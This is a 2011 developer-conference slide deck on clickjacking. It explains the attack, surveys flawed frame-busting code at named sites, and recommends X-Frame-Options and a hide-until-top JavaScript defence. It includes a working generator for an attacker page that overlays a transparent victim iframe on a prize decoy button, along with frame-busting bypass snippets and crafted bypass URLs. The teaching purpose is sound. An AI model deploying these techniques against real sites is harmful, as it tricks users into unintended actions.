Clickjacking DevCon2011

Developer Conference 2011
MICROSOFT USER GROUP HYDERABAD

It is this easy to steal your click!
(Secure Web Development)
Krishna Chaitanya T
Security & Privacy Research Lab, Infosys Labs
Microsoft MVP - Internet Explorer
http://novogeek.com | @novogeek

Agenda!
Saw these on Facebook?
Your genuine web page can be a victim as well! Let's secure it!

Clickjacking
Discovered in 2008 by Robert Hansen and Jeremiah Grossman
Forces a victim to unintentionally click on an invisible page
Made possible by overlaying transparent layers
Basic clickjacking:
- Positioning via CSS (JS not required!)
- Follow the mouse cursor via JS
Advanced techniques:
- Clickjacking + XSS
- Clickjacking + CSRF
- Clickjacking + HTML5 Drag/Drop API

The mischievous <iframe> tag
A web page can embed another web page via an iframe:
  <iframe src="http://bing.com"></iframe>
CSS opacity property: 1 = visible, 0 = invisible (a fully transparent iframe still receives the clicks)

Clickjacking using CSS & JS
demo
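As an added example (not part of the slide deck, and not the demo the speaker ran), the following JavaScript builds the attacker page for the basic, CSS-only clickjack described above: a visible decoy button with a transparent iframe of the victim stacked on top of it, positioned so the victim's real button sits exactly under the decoy. The victim URL, button coordinates and decoy text are made-up values; only the placement arithmetic is real attacker-side logic. Write the returned string to a file and open it in a browser to see the layout (set the opacity to 0.5 first to watch the alignment).

```javascript
// Added example, not from the slides: the attacker page behind a basic
// clickjacking demo, built by a plain function so it can be inspected and
// tested without a browser. The victim URL and coordinates are hypothetical.

// Places the victim iframe so that the victim's button, which sits at
// (buttonX, buttonY) inside the framed document, lands on the decoy at
// (decoyX, decoyY) in the attacker page. Negative offsets are normal: the
// iframe is shifted up/left until only the wanted region overlaps the decoy.
function overlayOffset(decoyX, decoyY, buttonX, buttonY) {
  return { left: decoyX - buttonX, top: decoyY - buttonY };
}

// Returns the complete attacker page as HTML. The decoy is centred on
// (decoyX, decoyY) via translate(-50%, -50%); the iframe is absolutely
// positioned, fully transparent, and given a higher z-index so the click
// reaches the framed victim rather than the decoy the user thinks they hit.
function buildClickjackPage(opts) {
  var off = overlayOffset(opts.decoyX, opts.decoyY, opts.buttonX, opts.buttonY);
  return [
    "<!doctype html>",
    "<html><head><meta charset=\"utf-8\"><title>Win a prize</title>",
    "<style>",
    "  body { margin: 0; }",
    "  #decoy { position: absolute; left: " + opts.decoyX + "px; top: " + opts.decoyY + "px;",
    "           transform: translate(-50%, -50%); padding: 12px 24px; font-size: 18px; }",
    "  #victim { position: absolute; left: " + off.left + "px; top: " + off.top + "px;",
    "            width: 1200px; height: 800px; border: 0;",
    "            opacity: 0;      /* 0 = invisible, 1 = visible; use 0.5 while aligning */",
    "            z-index: 2; }    /* above the decoy, so the click goes to the iframe   */",
    "</style></head><body>",
    "<button id=\"decoy\">" + opts.decoyText + "</button>",
    "<iframe id=\"victim\" src=\"" + opts.victimUrl + "\"></iframe>",
    "</body></html>",
  ].join("\n");
}

// Constructed demo parameters (hypothetical victim page and geometry).
var DEMO = {
  victimUrl: "http://victim.example/approve",   // page with the one-click button
  buttonX: 640, buttonY: 420,                   // where that button sits in the victim page
  decoyX: 300, decoyY: 200,                     // where the decoy is drawn on the attacker page
  decoyText: "Click to claim your prize",
};

function demoPage() {
  return buildClickjackPage(DEMO);
}

console.log(demoPage());
```

Note that no JavaScript runs in the attacker page at all: the positioning and transparency are pure CSS, which is why a victim page can only defend itself with its own script (frame busting) or a response header, never by blocking script on the attacker's side.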
Frame busting!
Techniques for preventing your site from being framed
Common frame busting code:
  if (top != self) {                 // condition: am I framed?
    top.location = self.location;    // counter action: navigate the top window to myself
  }

Survey
Acknowledgement: all survey content is from the Stanford Web Security Research Lab
What's wrong?
Walmart.com
  if (top.location != location) {
    if (document.referrer &&
        document.referrer.indexOf("walmart.com") == -1) {
      top.location.replace(document.location.href);
    }
  }
USBank.com
  if (self != top) {
    var domain = getDomain(document.referrer);
    var okDomains = /usbank|localhost|usbnet/;
    var matchDomain = domain.search(okDomains);
    if (matchDomain == -1) {
      /* frame bust */
    }
  }
Many
  if (top.location != self.location) {
    parent.location = self.location;
  }
- Walmart: error in referrer checking. The check only asks whether "walmart.com" occurs anywhere in the referrer string, so the attacker URL can be: http://www.attacker.com/walmart.com.html
- USBank: error in referrer checking. The regex matches "usbank" anywhere in the host name, so the attacker URL can be: http://usbank.attacker.com
- Many: 'parent' refers to the window one level higher, not the top window. Double framing (attacker page -> intermediate frame -> victim) breaks this: the victim only replaces the intermediate frame, and the outer attacker page stays in place.

Busting frame busting!
HTML5 sandbox
  <iframe sandbox src="http://www.victim.com">
- JavaScript is disabled!
- Prevents XSS
- Prevents defacement
- Facilitates clickjacking! (the victim's frame busting script never runs)
onBeforeUnload event
  <h1>www.attacker.com</h1>
  <script>
  window.onbeforeunload = function() {
    return "Do you want to leave your favorite site?";
  }
  </script>
  <iframe src="http://www.paypal.com">
- When the framed page's frame busting tries to navigate the top window, the attacker's handler shows a prompt; if the user cancels, the navigation is abandoned and the victim stays framed.
XSS filters
- XSS filters in browsers block this iframe's frame busting script, because the script's own text is reflected in the request URL and the filter neuters it:
  <iframe src="http://www.example.org/?xyz=%3Cscript%20type=%22text/javascript%22%3Eif"></iframe>
204 HTTP header
  var kill_bust = 0
  window.onbeforeunload = function() { kill_bust++ }
  setInterval(function() {
    if (kill_bust > 0) {
      kill_bust -= 2;
      window.top.location = 'http://no-content-204.com'
    }
  }, 1);
  <iframe src="http://www.victim.com">
- Each time the victim's frame busting starts to navigate the top window, the attacker redirects the top window to a URL answering HTTP 204 (No Content). A 204 leaves the current page in place, so the attacker page survives and the frame busting never completes.
Mobile sites
- Non-mobile sites do frame busting.
- What about their mobile versions?

Is there any hope?
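Before moving on to the fix, here is the survey's referrer-checking flaw worked through as an added example (not from the slides or the Stanford paper). Each function answers "would this code frame-bust for this value of document.referrer?", with the `self != top` precondition assumed; the slide's `getDomain()` is not shown, so a stand-in that parses the URL is supplied here, and the function names, allow-lists and sample referrers are all constructed for the example. The double-framing case (`parent.location`) needs real nested windows and is not modelled.

```javascript
// Added example, not from the slides: the two broken referrer checks from the
// survey as plain functions, plus a corrected check, run against constructed
// referrer values so the bypasses are visible without a browser.

// Walmart-style check: substring search anywhere in the referrer string.
// Note the `&&`: an empty referrer skips the bust entirely.
function walmartWouldBust(referrer) {
  return Boolean(referrer) && referrer.indexOf("walmart.com") === -1;
}

// Stand-in for the slide's getDomain(): the host name of the referrer, or an
// empty string when there is no (parseable) referrer.
function getDomain(referrer) {
  try {
    return new URL(referrer).hostname;
  } catch (e) {
    return "";
  }
}

// USBank-style check: unanchored regex over the host name.
function usbankWouldBust(referrer) {
  var okDomains = /usbank|localhost|usbnet/;
  var matchDomain = getDomain(referrer).search(okDomains);
  return matchDomain === -1;
}

// Corrected check: fail closed on a missing or unparseable referrer, then
// compare the whole host against an allow-list, accepting only an exact match
// or a genuine subdomain. The "." prefix is what "usbank.attacker.com" lacks.
function fixedWouldBust(referrer, allowedHosts) {
  var host = getDomain(referrer);
  if (!host) return true;
  var allowed = allowedHosts.some(function (h) {
    return host === h || host.endsWith("." + h);
  });
  return !allowed;
}

// Constructed referrers: a genuine same-site navigation, the two bypass URLs
// from the slides, and a stripped (empty) referrer.
var REFERRERS = {
  legit: "https://www.walmart.com/checkout",
  walmartBypass: "http://www.attacker.com/walmart.com.html",
  usbankBypass: "http://usbank.attacker.com/",
  stripped: "",
};

// Tabulates each check's verdict per referrer; true means "frame busts".
function surveyResults() {
  return {
    walmart: {
      legit: walmartWouldBust(REFERRERS.legit),          // false: correct
      bypass: walmartWouldBust(REFERRERS.walmartBypass), // false: bypassed
      stripped: walmartWouldBust(REFERRERS.stripped),    // false: bypassed
    },
    usbank: {
      bypass: usbankWouldBust(REFERRERS.usbankBypass),   // false: bypassed
      stripped: usbankWouldBust(REFERRERS.stripped),     // true: busts
    },
    fixed: {
      legit: fixedWouldBust(REFERRERS.legit, ["walmart.com"]),                // false
      walmartBypass: fixedWouldBust(REFERRERS.walmartBypass, ["walmart.com"]), // true
      usbankBypass: fixedWouldBust(REFERRERS.usbankBypass, ["usbank.com"]),    // true
      stripped: fixedWouldBust(REFERRERS.stripped, ["walmart.com"]),           // true
    },
  };
}

console.log(JSON.stringify(surveyResults(), null, 2));
```

Even the corrected version still trusts document.referrer, which the attacker can influence (it is absent, for example, when the framing page chooses not to send one), and it still runs as script, so every bypass on the previous slides applies to it. It is a stopgap for browsers that ignore the header described next, not a replacement for it.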
X-Frame-Options
The savior! An innovative idea introduced by Microsoft in IE8
HTTP header sent on the response
Possible values: "DENY" and "SAMEORIGIN"
Implemented by most modern browsers
Does not depend on JavaScript!
Ex (ASP.NET): Response.AddHeader("X-Frame-Options", "DENY");
Limitations:
- Poor adoption by sites (because of developer ignorance!)
- No whitelisting: either block all framing (DENY) or allow only your own origin (SAMEORIGIN); you cannot allow one specific third-party site.
Nevertheless, the advantages outweigh the disadvantages.
Content Security Policy (CSP), introduced by Mozilla, is the other header-based approach.
Best JS solution
  <style>html { visibility: hidden }</style>
  <script>
  if (self == top) {
    document.documentElement.style.visibility = 'visible';
  } else {
    top.location = self.location;
  }
  </script>
The page starts hidden and is only revealed once the script has confirmed it is the top window. If an attacker defeats the navigation (204 trick, onbeforeunload prompt, sandbox), the framed page stays invisible and receives no clicks, so there is nothing left to hijack.

Frame busting (X-Frame-Options & JavaScript solutions)
demo

It's your turn now!
Are your sites clickjacking proof?
Think about a one-click approval button being clickjacked!
Go back and add the X-Frame-Options header to your web projects at the office (and earn the goodwill of your boss)
For users on old browsers that do not honour the header, have the JS protection in place as well
If a link on Facebook opens a new window, be highly cautious and avoid clicking. Inquisitive? Check for a hidden <iframe> ;)
Check your social apps and revoke access to any you no longer use.
We learnt to break things in order to build better things. Ethics, please!

References
- "Busting frame busting: a study of clickjacking vulnerabilities at popular sites", Rydstedt, Bursztein, Boneh and Jackson, Stanford Web Security Research Lab, 2010.
- "Birth of a Security Feature: ClickJacking Defense", IEBlog.
- "IE8 Security Part VII: ClickJacking Defenses", IEBlog.

I'm done!
Blog: novogeek.com
Twitter: @novogeek

Sponsors